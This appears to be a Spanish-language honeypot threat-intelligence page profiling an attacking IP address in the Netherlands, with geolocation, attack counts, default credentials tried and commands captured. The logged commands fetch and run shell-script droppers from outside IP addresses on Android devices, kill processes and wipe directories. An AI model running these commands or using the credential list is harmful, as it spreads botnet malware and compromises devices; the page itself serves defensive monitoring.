Amenaza Activa • ALTO

46.151.182.230

Pais de Origen🇳🇱 Paises Bajos

Primera Deteccion29/12/2025

Ultima Actividad22/1/2026

ISPOptibounce, LLC

🎯

3526

Ataques Totales

🔌

Puertos

📡

Tipos Ataque

🦠

Malware

Geolocalizacion

Pais: 🇳🇱 Paises Bajos
Ciudad: Desconocida
ASN: AS214967
ISP: Optibounce, LLC

Tipos de Ataque

honeytrap

cowrie

adbhoney

Puertos Atacados

2222555555562223

Malware Asociado

0eea9ca9f3fbc41811e1...→8a6ec7b5e46a3a9e5ee8...→

Credenciales Intentadas

🔐user/user

24x

🔐telecomadmin/admintelecom

22x

🔐ubnt/ubnt

20x

🔐root/password

20x

🔐root/root

20x

🔐user/password

19x

🔐admin/admin

19x

🔐admin/admin1234

19x

🔐root/123456789

19x

🔐root/default

19x

🔐admin/123456789

19x

🔐admin/1234

19x

🔐default/default

18x

🔐root/12345678

18x

🔐admin/(vacio)

18x

Comandos Ejecutados

cd /data/local/tmp; rm -rf *; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android

50x

$echo SHELL_TEST43x

cd /data/local/tmp; chmod 777 *; ./iran.armv7l android; ./iran.x86_64 android; wget http://87.121.84.11:84/cat.sh || curl http://87.121.84.11:84/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android; rm -rf *;

36x

cd /data/local/tmp; wget http://45.67.138.196/peniss.sh || curl http://45.67.138.196/peniss.sh -o peniss.sh; chmod 777 peniss.sh; sh peniss.sh android || ./peniss.sh android

34x

for pid in /proc/[0-9]*; do pid_num="${pid##*/}"; if [ -r "$pid/maps" ]; then suspicious=true; while IFS= read -r line; do case "$line" in *"/lib/"*|*"/lib64/"*|*".so"*) suspicious=false; break;; esac; done < "$pid/maps"; if [ "$suspicious" = true ]; then kill -9 "$pid_num"; fi; fi; done; cd /data/local/tmp; rm -rf *; wget http://130.12.180.80/cat.sh || curl http://45.67.138.196/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android

17x

cd /data/local/tmp; rm -rf *; wget http://130.12.180.80/cat.sh || curl http://45.67.138.196/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android

17x

cd /data/local/tmp; rm -rf *; wget http://45.67.138.196/peniss.sh || curl http://45.67.138.196/peniss.sh; chmod 777 peniss.sh; sh peniss.sh android || ./peniss.sh android

17x

$echo hello11x

$./8x

$id6x

Evaluacion de Riesgo

/100

BajoMedioAltoCritico